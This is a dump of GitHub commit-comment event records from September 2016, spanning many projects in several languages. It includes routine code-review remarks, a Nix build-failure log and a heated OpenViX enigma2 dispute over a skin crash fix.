{"id":"4587827963","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091500,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T06:59:48Z","updated_at":"2016-09-20T06:59:48Z","body":"The skins were about to be changed anyway (no point in using relative values in a fixed value skin).\r\n\r\nBut if you know of any better fix for the crash, I would welcome that of course.\r\nThe crash is 100% reproducible when using the 'radar'-pictures from the attached plugin.\r\n[HetWeer.zip](https://github.com/OpenViX/enigma2/files/481796/HetWeer.zip)\r\n"}},"created_at":"2016-09-20T06:59:48Z"}
{"id":"4587830437","type":"CommitCommentEvent","actor":{"login":"jacktan1991"},"repo":{"name":"jacktan1991/smartsql"},"payload":{"comment":{"id":19091514,"position":316,"line":316,"path":"smartsql.py","commit_id":"ea5ff81513b5b01e7bb9631650687f113ab36d34","created_at":"2016-09-20T07:00:25Z","updated_at":"2016-09-20T07:00:25Z","body":"这样导致解决#8中的common_datetime_wheres时，只能用`wheres = Condition('TRUE')`，而不能使用`wheres = ConditionSet()`"}},"created_at":"2016-09-20T07:00:25Z"}
{"id":"4587835125","type":"CommitCommentEvent","actor":{"login":"DiegoAndai"},"repo":{"name":"DiegoAndai/Deep-learning-framework-research"},"payload":{"comment":{"id":19091527,"position":null,"line":null,"path":null,"commit_id":"9bf7377f90c9cb751111a57220f76c9709d9e117","created_at":"2016-09-20T07:01:43Z","updated_at":"2016-09-20T07:01:43Z","body":"Repush para un final... 😆 "}},"created_at":"2016-09-20T07:01:43Z"}
{"id":"4587835617","type":"CommitCommentEvent","actor":{"login":"Taapat"},"repo":{"name":"Taapat/enigma2-openpli-vuplus"},"payload":{"comment":{"id":19091529,"position":null,"line":null,"path":null,"commit_id":"a0c5b79f765b9c8314024d55ca9910e3e981959b","created_at":"2016-09-20T07:01:52Z","updated_at":"2016-09-20T07:01:52Z","body":"Sorry, but I'm not asked to add this in openpli.\r\nThis is workoround for me personally to remove the error messages at each volume change on my solo2.\r\nWe can simply remove the code between #if 0... #endif stuff and not use it. I left it only to reduce conflicts on merge.\r\nIf I had sure that it is not breaking the other receivers I have created a pull rquest on openli."}},"created_at":"2016-09-20T07:01:52Z"}
{"id":"4587836180","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19091530,"position":null,"line":null,"path":null,"commit_id":"58ba83d38e22eef08cab9cc2905cf30fd48888dd","created_at":"2016-09-20T07:02:01Z","updated_at":"2016-09-20T07:02:01Z","body":"Приложение так и не запускается локально. Нужно поправить ошибки и добавить инструкцию."}},"created_at":"2016-09-20T07:02:01Z"}
{"id":"4587836722","type":"CommitCommentEvent","actor":{"login":"JoanneTseng"},"repo":{"name":"JoanneTseng/Java-"},"payload":{"comment":{"id":19091533,"position":null,"line":null,"path":null,"commit_id":"fe0d0b8e62261e051c1ed018e0092a00b9a1da71","created_at":"2016-09-20T07:02:11Z","updated_at":"2016-09-20T07:02:11Z","body":"利用else補足其餘額的狀況"}},"created_at":"2016-09-20T07:02:11Z"}
{"id":"4587837418","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19091535,"position":null,"line":null,"path":null,"commit_id":"7c6c476e9666f2a67b4b0c88af2f5a8dace437d0","created_at":"2016-09-20T07:02:24Z","updated_at":"2016-09-20T07:02:24Z","body":"@snicolet Thank you for the explanation."}},"created_at":"2016-09-20T07:02:24Z"}
{"id":"4587838293","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19091538,"position":null,"line":null,"path":null,"commit_id":"9b99c3886d316a36b01a700e51301b26413e3d21","created_at":"2016-09-20T07:02:38Z","updated_at":"2016-09-20T07:02:38Z","body":"感觉这样就行了。\r\n\r\n```css\r\n.ant-spin-nested-loading > .ant-spin-container {\r\n  pointer-events: none;\r\n}\r\n```"}},"created_at":"2016-09-20T07:02:38Z"}
{"id":"4587841109","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19091551,"position":6,"line":6,"path":"webpack.config.js","commit_id":"10bbb452482bc441f0fa0bdc5c9fad691aac42e5","created_at":"2016-09-20T07:03:27Z","updated_at":"2016-09-20T07:03:27Z","body":"В webpack.config.js табы намешаны с пробелами."}},"created_at":"2016-09-20T07:03:27Z"}
{"id":"4587841243","type":"CommitCommentEvent","actor":{"login":"jodosha"},"repo":{"name":"hanami/model"},"payload":{"comment":{"id":19091552,"position":null,"line":null,"path":null,"commit_id":"ab6766217fb791eb8fa58d0c11253af9a3eacd14","created_at":"2016-09-20T07:03:30Z","updated_at":"2016-09-20T07:03:30Z","body":"@lucasallan Cause on JRuby these timestamps are strings instead of `Time`/`DateTime` instances."}},"created_at":"2016-09-20T07:03:30Z"}
{"id":"4587843006","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091556,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:03:42Z","updated_at":"2016-09-20T07:03:42Z","body":"And has broken the embedded skin in my plugin.\r\n\r\nWhat you have done is stop anyone using fixed values. Why not write a proper fix. There is not even a bug report for this so no one knows how to reproduce or come up with a proper fix.\r\n\r\nUsing a Try/except is just hiding the fact that this code is not able to handle the unfound error."}},"created_at":"2016-09-20T07:03:42Z"}
{"id":"4587844281","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091561,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:04:04Z","updated_at":"2016-09-20T07:04:04Z","body":"Are you aware of any other places where e-settings are still being used?"}},"created_at":"2016-09-20T07:04:04Z"}
{"id":"4587847225","type":"CommitCommentEvent","actor":{"login":"donaldpipowitch"},"repo":{"name":"webpack/webpack"},"payload":{"comment":{"id":19091563,"position":null,"line":null,"path":null,"commit_id":"40a67f632ce17746fa8646a10fa6e06e54eea538","created_at":"2016-09-20T07:04:51Z","updated_at":"2016-09-20T07:04:51Z","body":"Even better. Maybe we can use https://github.com/bcherny/json-schema-to-typescript to do that."}},"created_at":"2016-09-20T07:04:51Z"}
{"id":"4587847767","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091565,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:05:02Z","updated_at":"2016-09-20T07:05:02Z","body":"And has broken the embedded skin in my plugin.\r\nNo: it's in the skin now. And that also allows for the Text-version."}},"created_at":"2016-09-20T07:05:02Z"}
{"id":"4587849928","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"YevhenHordiichuk-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":19091573,"position":26,"line":26,"path":"homework_4_14.cpp","commit_id":"8c9765aedd6c5dde9ba939fa1774f0391215f2c7","created_at":"2016-09-20T07:05:36Z","updated_at":"2016-09-20T07:05:36Z","body":"сразу же можно проверить на равенство краевые значения"}},"created_at":"2016-09-20T07:05:36Z"}
{"id":"4587851875","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091577,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:06:07Z","updated_at":"2016-09-20T07:06:07Z","body":"> What you have done is stop anyone using fixed values. \r\n\r\nOn the contrary: fixed values are not affected."}},"created_at":"2016-09-20T07:06:07Z"}
{"id":"4587855670","type":"CommitCommentEvent","actor":{"login":"vbarhatov"},"repo":{"name":"ibarhatov/HelloWorld"},"payload":{"comment":{"id":19091601,"position":10,"line":10,"path":"HelloWorld/src/com/company/FileWorker.java","commit_id":"c93724db6004bb05aff9bec219cea64a944fb3e7","created_at":"2016-09-20T07:07:11Z","updated_at":"2016-09-20T07:07:11Z","body":"по правилам Java Code Conventions СТАТИЧЕСКИЕ_ПОЛЯ_НАЗЫВАЮТСЯ_КАПСОМ"}},"created_at":"2016-09-20T07:07:11Z"}
{"id":"4587855890","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"YevhenHordiichuk-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":19091603,"position":30,"line":30,"path":"homework_4_14.cpp","commit_id":"8c9765aedd6c5dde9ba939fa1774f0391215f2c7","created_at":"2016-09-20T07:07:14Z","updated_at":"2016-09-20T07:07:14Z","body":"есть ли уверенность, что вы не пропустите значение х, если они в каком-то из сценариев попадет на правую границу текущего рассматриваемого отрезка? Включаете или не включаете вы правую границу отрезка при анализе?"}},"created_at":"2016-09-20T07:07:14Z"}
{"id":"4587856986","type":"CommitCommentEvent","actor":{"login":"hughsando"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19091604,"position":null,"line":null,"path":null,"commit_id":"b599ee4679aacafb581fb1aa624ff9175f57952b","created_at":"2016-09-20T07:07:32Z","updated_at":"2016-09-20T07:07:32Z","body":"I forgot linux is a bit more picky about these qualifications.\r\nShould be fixed."}},"created_at":"2016-09-20T07:07:32Z"}
{"id":"4587859563","type":"CommitCommentEvent","actor":{"login":"krishnenthuchakra1977"},"repo":{"name":"krishnenthuchakra1977/imad-2016-app"},"payload":{"comment":{"id":19091609,"position":null,"line":null,"path":null,"commit_id":"21b5ac3a55301aa387e2f841bb1fedef4f3a2542","created_at":"2016-09-20T07:08:11Z","updated_at":"2016-09-20T07:08:11Z","body":"![images](https://cloud.githubusercontent.com/assets/22211416/18660601/081e71ae-7f2f-11e6-9e5d-d6c0414943d0.jpg)\r\n"}},"created_at":"2016-09-20T07:08:11Z"}
{"id":"4587863025","type":"CommitCommentEvent","actor":{"login":"seanf"},"repo":{"name":"zanata/zanata-spa"},"payload":{"comment":{"id":19091618,"position":null,"line":null,"path":null,"commit_id":"f1a29ef6801840cc4fd22066dcb5748928fab6a0","created_at":"2016-09-20T07:09:08Z","updated_at":"2016-09-20T07:09:08Z","body":"@aeng To avoid confusion, we should probably remove everything from this repository in `master` except this statement. In other words,  delete the other files, and the rest of the readme."}},"created_at":"2016-09-20T07:09:08Z"}
{"id":"4587863231","type":"CommitCommentEvent","actor":{"login":"justingreenberg"},"repo":{"name":"davezuko/react-redux-starter-kit"},"payload":{"comment":{"id":19091619,"position":38,"line":24,"path":"src/main.js","commit_id":"4ecc655ae7c5db83e6c3edffd7456a667191bf2e","created_at":"2016-09-20T07:09:11Z","updated_at":"2016-09-20T07:09:11Z","body":"also we probably don't need to pass history to router anymore... if we need access to history in `AppContainer` (ie to dispatch a LOCATION_CHANGE) we can just import the `browserHistory` singleton :)"}},"created_at":"2016-09-20T07:09:11Z"}
{"id":"4587864696","type":"CommitCommentEvent","actor":{"login":"vbarhatov"},"repo":{"name":"ibarhatov/HelloWorld"},"payload":{"comment":{"id":19091623,"position":38,"line":38,"path":"HelloWorld/src/com/company/FileWorker.java","commit_id":"c93724db6004bb05aff9bec219cea64a944fb3e7","created_at":"2016-09-20T07:09:36Z","updated_at":"2016-09-20T07:09:36Z","body":"файлы нужно закрывать"}},"created_at":"2016-09-20T07:09:36Z"}
{"id":"4587864750","type":"CommitCommentEvent","actor":{"login":"aleclarson"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":19091622,"position":22,"line":22,"path":"scripts/babel/transform-object-assign-require.js","commit_id":"1573baaee8ba1c9cd84145b01effcb5eb80503fb","created_at":"2016-09-20T07:09:35Z","updated_at":"2016-09-20T07:09:35Z","body":"@zpao Should this detect when the visited module is `object-assign` itself? Just ran into this because `object-assign` was in `react/node_modules` and had this transform applied to it."}},"created_at":"2016-09-20T07:09:35Z"}
{"id":"4587865752","type":"CommitCommentEvent","actor":{"login":"krishnenthuchakra1977"},"repo":{"name":"krishnenthuchakra1977/imad-2016-app"},"payload":{"comment":{"id":19091626,"position":null,"line":null,"path":null,"commit_id":"21b5ac3a55301aa387e2f841bb1fedef4f3a2542","created_at":"2016-09-20T07:09:53Z","updated_at":"2016-09-20T07:09:53Z","body":"![images](https://cloud.githubusercontent.com/assets/22211416/18660648/486dfe28-7f2f-11e6-935b-2173a5c32182.jpg)\r\n"}},"created_at":"2016-09-20T07:09:53Z"}
{"id":"4587866557","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091631,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:10:06Z","updated_at":"2016-09-20T07:10:06Z","body":"Why is there no bug report?\r\n\r\nI reverted the original commit because the code is just plain wrong. \r\n\r\nI was trying to be kind to the person who wrote the code not to say what a poor fix it was. The coding is plain wrong whatever it is supposed to fix or not. It is just a workaround and a very poorly written one."}},"created_at":"2016-09-20T07:10:06Z"}
{"id":"4587871452","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091643,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:11:25Z","updated_at":"2016-09-20T07:11:25Z","body":"> But if you know of any better fix for the crash, I would welcome that of course.\r\n> The crash is 100% reproducible when using the 'radar'-pictures from the attached plugin.\r\n> HetWeer.zip"}},"created_at":"2016-09-20T07:11:25Z"}
{"id":"4587872944","type":"CommitCommentEvent","actor":{"login":"SilverFire"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19091647,"position":42,"line":480,"path":"framework/web/View.php","commit_id":"fd6dd73cec3e7a35855c9d088f839581a9e09ace","created_at":"2016-09-20T07:11:47Z","updated_at":"2016-09-20T07:11:47Z","body":"Already fixed. See actual code https://github.com/yiisoft/yii2/blob/master/framework/web/View.php#L483"}},"created_at":"2016-09-20T07:11:47Z"}
{"id":"4587873726","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19091653,"position":21,"line":20,"path":"client/addItem/addItemController.js","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T07:12:01Z","updated_at":"2016-09-20T07:12:01Z","body":"Лучше разрулить это все в сервисе, а тут уже обрабатывать успешный результат или ошибку. Незачем в контроллере со статусами разбираться."}},"created_at":"2016-09-20T07:12:01Z"}
{"id":"4587877958","type":"CommitCommentEvent","actor":{"login":"mcollina"},"repo":{"name":"gulpjs/vinyl"},"payload":{"comment":{"id":19091667,"position":null,"line":null,"path":null,"commit_id":"38096364be6d82323f310a3c44d90899f552e45d","created_at":"2016-09-20T07:13:09Z","updated_at":"2016-09-20T07:13:09Z","body":"It's definitely the latest fix in cloneable-readable. Looking at the test, this _should not work_, but timeout.\r\nThis should happen because we need to flow all instances to get started."}},"created_at":"2016-09-20T07:13:09Z"}
{"id":"4587879193","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091673,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:13:28Z","updated_at":"2016-09-20T07:13:28Z","body":"The crashreport has been posted on https://github.com/OpenViX/enigma2/commit/083cc97b8b3a5fdef870e94860021684d77ed706"}},"created_at":"2016-09-20T07:13:28Z"}
{"id":"4587879553","type":"CommitCommentEvent","actor":{"login":"mcollina"},"repo":{"name":"gulpjs/vinyl"},"payload":{"comment":{"id":19091674,"position":null,"line":null,"path":null,"commit_id":"38096364be6d82323f310a3c44d90899f552e45d","created_at":"2016-09-20T07:13:34Z","updated_at":"2016-09-20T07:13:34Z","body":"A PR is in the works.."}},"created_at":"2016-09-20T07:13:34Z"}
{"id":"4587881351","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091678,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:14:02Z","updated_at":"2016-09-20T07:14:02Z","body":"So why don't you fix the plugin instead of editing skin.py and a load of other skins. And Breaking my plugin."}},"created_at":"2016-09-20T07:14:02Z"}
{"id":"4587883573","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091682,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:14:38Z","updated_at":"2016-09-20T07:14:38Z","body":"Please revert this commit."}},"created_at":"2016-09-20T07:14:38Z"}
{"id":"4587884418","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19091687,"position":19,"line":19,"path":"client/addItem/addItemController.js","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T07:14:51Z","updated_at":"2016-09-20T07:14:51Z","body":"Нужно писать в одном стиле. Если уж arrow functions, то везде использовать единый подход."}},"created_at":"2016-09-20T07:14:51Z"}
{"id":"4587884647","type":"CommitCommentEvent","actor":{"login":"tomlutzenberger"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":19091686,"position":null,"line":null,"path":null,"commit_id":"63129112bbea91f7cd62014f162f857f50084656","created_at":"2016-09-20T07:14:51Z","updated_at":"2016-09-20T07:14:51Z","body":"I think it is also a sign of professionality and good manners to avoid such wording. If someone wants to curse and talk like a redneck, that's okay. But don't do this on a public project."}},"created_at":"2016-09-20T07:14:51Z"}
{"id":"4587888024","type":"CommitCommentEvent","actor":{"login":"dhess"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19091701,"position":null,"line":null,"path":null,"commit_id":"7b9d3f860588c5157ec9cb2a325e9e16a2ab6e17","created_at":"2016-09-20T07:15:50Z","updated_at":"2016-09-20T07:15:50Z","body":"Yep, I'm currently stuck on ghc bootstrapping in the staging branch. I don't really understand what was broken with Darwin libiconv before this commit, but there is some libiconv magic in `7.4.2-binary.nix` and I wonder if it's related.\r\n\r\n```\r\nbuilding path(s) ‘/nix/store/xnxadz0z3b5jp982i0hw1qblz6s6f09q-ghc-7.4.2-binary’\r\nunpacking sources\r\nunpacking source archive /nix/store/2xf761ay6f58g4blqd5027iqy21wv26q-ghc-7.4.2-x86_64-apple-darwin.tar.bz2\r\nsource root is ghc-7.4.2\r\nsetting SOURCE_DATE_EPOCH to timestamp 1474354631 of file ghc-7.4.2/libraries/xhtml/dist-install/setup-config\r\nwarning: file ghc-7.4.2/libraries/xhtml/dist-install/setup-config may be generated; SOURCE_DATE_EPOCH may be non-deterministic\r\npatching sources\r\nconfiguring\r\nchecking for path to top of build tree... dyld: lazy symbol binding failed: Symbol not found: _locale_charset\r\n  Referenced from: /private/var/folders/yz/8pcqf42123vg6dqqq145w15c0000gn/T/nix-build-ghc-7.4.2-binary.drv-0/ghc-7.4.2/utils/ghc-pwd/dist-install/build/tmp/ghc-pwd\r\n  Expected in: /private/var/folders/yz/8pcqf42123vg6dqqq145w15c0000gn/T/nix-build-ghc-7.4.2-binary.drv-0/ghc-7.4.2/utils/ghc-pwd/dist-install/build/tmp/libiconv.dylib\r\n\r\ndyld: Symbol not found: _locale_charset\r\n  Referenced from: /private/var/folders/yz/8pcqf42123vg6dqqq145w15c0000gn/T/nix-build-ghc-7.4.2-binary.drv-0/ghc-7.4.2/utils/ghc-pwd/dist-install/build/tmp/ghc-pwd\r\n  Expected in: /private/var/folders/yz/8pcqf42123vg6dqqq145w15c0000gn/T/nix-build-ghc-7.4.2-binary.drv-0/ghc-7.4.2/utils/ghc-pwd/dist-install/build/tmp/libiconv.dylib\r\n\r\nconfigure: error: cannot determine current directory\r\nbuilder for ‘/nix/store/ya5sk0lfznbndq24mnblacj1lsqs1m2b-ghc-7.4.2-binary.drv’ failed with exit code 1\r\ncannot build derivation ‘/nix/store/mlb2z588bpih5aiysd9l7sbri5r9m1qy-ghc-7.8.4.drv’: 1 dependencies couldn't be built\r\nbuilding path(s) ‘/nix/store/xy4w1pr713lbj9vgv881wnvwaq58dzwb-libsecurity_utilities-osx-10.7.5’\r\ncannot build derivation ‘/nix/store/jnk4hcd89qqr0hs097y751dq3mvnmpd7-ghc-7.10.3.drv’: 1 dependencies couldn't be built\r\ncannot build derivation ‘/nix/store/0d3jdflf6nmykjnmaxslvkll31p3aqhc-ghc-8.0.1.drv’: 1 dependencies couldn't be built\r\nkilling process 25765\r\ncannot build derivation ‘/nix/store/7mk9hwnfvx0y77pc5z8i95cyxx5zbhas-ghc-8.0.1.drv’: 1 dependencies couldn't be built\r\ncannot build derivation ‘/nix/store/yps50vw1jf1l5b2v6ybzfdkn9cd2whk4-haskell-env.drv’: 1 dependencies couldn't be built\r\nerror: build of ‘/nix/store/yps50vw1jf1l5b2v6ybzfdkn9cd2whk4-haskell-env.drv’ failed\r\n```"}},"created_at":"2016-09-20T07:15:50Z"}
{"id":"4587888816","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091705,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:16:03Z","updated_at":"2016-09-20T07:16:03Z","body":"Please stop that: the plugin ABM has not been broken.\r\nAnd the 'culprit' plugin runs fine in PLi/XTA/ATV, so it's really a ViX-bug."}},"created_at":"2016-09-20T07:16:03Z"}
{"id":"4587890920","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091714,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:16:35Z","updated_at":"2016-09-20T07:16:35Z","body":"I didn't say anything about ABM."}},"created_at":"2016-09-20T07:16:35Z"}
{"id":"4587891888","type":"CommitCommentEvent","actor":{"login":"vbarhatov"},"repo":{"name":"ibarhatov/HelloWorld"},"payload":{"comment":{"id":19091718,"position":12,"line":12,"path":"HelloWorld/src/com/company/FileWorker.java","commit_id":"c93724db6004bb05aff9bec219cea64a944fb3e7","created_at":"2016-09-20T07:16:50Z","updated_at":"2016-09-20T07:16:50Z","body":"не человека, а списка человеков :)\r\n"}},"created_at":"2016-09-20T07:16:50Z"}
{"id":"4587892055","type":"CommitCommentEvent","actor":{"login":"13817197890"},"repo":{"name":"13817197890/Stock"},"payload":{"comment":{"id":19091719,"position":null,"line":null,"path":null,"commit_id":"f11595964e51a1885aeba83dbec7ee3a59eee920","created_at":"2016-09-20T07:16:53Z","updated_at":"2016-09-20T07:16:53Z","body":"initialize"}},"created_at":"2016-09-20T07:16:53Z"}
{"id":"4587892413","type":"CommitCommentEvent","actor":{"login":"Elland"},"repo":{"name":"bakkenbaeck/pinboard-ios"},"payload":{"comment":{"id":19091721,"position":null,"line":null,"path":null,"commit_id":"9a3918b9a8c522a7a554cd81ec2bd89e1fd55537","created_at":"2016-09-20T07:16:58Z","updated_at":"2016-09-20T07:16:58Z","body":"👍 "}},"created_at":"2016-09-20T07:16:58Z"}
{"id":"4587893183","type":"CommitCommentEvent","actor":{"login":"smth"},"repo":{"name":"frictionlessdata/goodtables-web"},"payload":{"comment":{"id":19091722,"position":5,"line":14,"path":"web/theme/templates/base.html","commit_id":"9450beef15998c7e7c2b058c4267bc22676e6cd2","created_at":"2016-09-20T07:17:11Z","updated_at":"2016-09-20T07:17:11Z","body":"The HTML required has [changed](https://github.com/okfn/a/commit/0bb34197c1238d01528bb4b557ec91ce731b0129). Try adding the `ok-panel-wrapper` ID, as shown [here](http://a.okfn.org/html/oki/panel/)."}},"created_at":"2016-09-20T07:17:11Z"}
{"id":"4587893478","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091725,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:17:16Z","updated_at":"2016-09-20T07:17:16Z","body":"Post a proper bug report. And revert this rubbish."}},"created_at":"2016-09-20T07:17:16Z"}
{"id":"4587894609","type":"CommitCommentEvent","actor":{"login":"RamonGilabert"},"repo":{"name":"hyperoslo/Cache"},"payload":{"comment":{"id":19091726,"position":1,"line":1,"path":".travis.yml","commit_id":"430b24a8bd98defd4174f9e24d53cbe0b285c936","created_at":"2016-09-20T07:17:34Z","updated_at":"2016-09-20T07:17:34Z","body":"Hey @kean! This branch will be finished by the end of the week, so you'll be able to use it with Carthage or Cocoapods.\r\n\r\nAlso, I recommend you take a look at Imaginary! It's still unreleased to the world, but we use it in all our apps! https://github.com/hyperoslo/Imaginary, it basically does caching of images."}},"created_at":"2016-09-20T07:17:34Z"}
{"id":"4587894785","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091727,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:17:36Z","updated_at":"2016-09-20T07:17:36Z","body":"> I didn't say anything about ABM.\r\n\r\nSo what is the meaning of\r\n\r\n> And Breaking my plugin\r\n\r\nthen?"}},"created_at":"2016-09-20T07:17:36Z"}
{"id":"4587895726","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19091730,"position":37,"line":37,"path":"client/table/dataService.js","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T07:17:51Z","updated_at":"2016-09-20T07:17:51Z","body":"Зачем when?"}},"created_at":"2016-09-20T07:17:51Z"}
{"id":"4587896105","type":"CommitCommentEvent","actor":{"login":"tylerstraub"},"repo":{"name":"home-assistant/home-assistant"},"payload":{"comment":{"id":19091732,"position":null,"line":null,"path":null,"commit_id":"e7f9fdca67675fc6ced54b334985c0fb76951034","created_at":"2016-09-20T07:17:57Z","updated_at":"2016-09-20T07:17:57Z","body":"Yikes - sudo init 6.. I didn't know this would create issues. Perhaps I just never noticed the warnings until the logger broke down temporarily and a lower level passed through to my output? I will look into graceful shutdowns, Thank you for the tip @balloob!"}},"created_at":"2016-09-20T07:17:57Z"}
{"id":"4587896124","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091733,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:17:57Z","updated_at":"2016-09-20T07:17:57Z","body":"REVERT THIS RUBBISH"}},"created_at":"2016-09-20T07:17:57Z"}
{"id":"4587896864","type":"CommitCommentEvent","actor":{"login":"jacktan1991"},"repo":{"name":"jacktan1991/smartsql"},"payload":{"comment":{"id":19091734,"position":316,"line":316,"path":"smartsql.py","commit_id":"ea5ff81513b5b01e7bb9631650687f113ab36d34","created_at":"2016-09-20T07:18:10Z","updated_at":"2016-09-20T07:18:10Z","body":"`self._sql = \"%s AND (%s)\" % (self._sql, c.sql) if not c._empty else self._sql`\r\n\r\n`self._sql = \"%s AND %s\" % (self._sql, c.sql) if not c._empty else self._sql`"}},"created_at":"2016-09-20T07:18:10Z"}
{"id":"4587897717","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19091737,"position":35,"line":35,"path":"client/table/dataService.js","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T07:18:23Z","updated_at":"2016-09-20T07:18:23Z","body":"Можно просто вернуть `return $http.post(urlConst + '.json', item)`"}},"created_at":"2016-09-20T07:18:23Z"}
{"id":"4587899785","type":"CommitCommentEvent","actor":{"login":"aw6658913"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19091742,"position":null,"line":null,"path":null,"commit_id":"9b99c3886d316a36b01a700e51301b26413e3d21","created_at":"2016-09-20T07:18:56Z","updated_at":"2016-09-20T07:18:56Z","body":"确实样式加个pointer-events: none; 就可以了"}},"created_at":"2016-09-20T07:18:56Z"}
{"id":"4587902800","type":"CommitCommentEvent","actor":{"login":"benjycui"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19091745,"position":null,"line":null,"path":null,"commit_id":"9b99c3886d316a36b01a700e51301b26413e3d21","created_at":"2016-09-20T07:19:43Z","updated_at":"2016-09-20T07:19:43Z","body":"但文字还是可以选中。"}},"created_at":"2016-09-20T07:19:43Z"}
{"id":"4587904929","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091750,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T07:20:19Z","updated_at":"2016-09-20T07:20:19Z","body":"No need for shouting; I'm not deaf...\r\n\r\nAs I said several times before: if you know of any better fix, please be my guest. In the meantime the fix works, and I couldn't find any negative consequences."}},"created_at":"2016-09-20T07:20:19Z"}
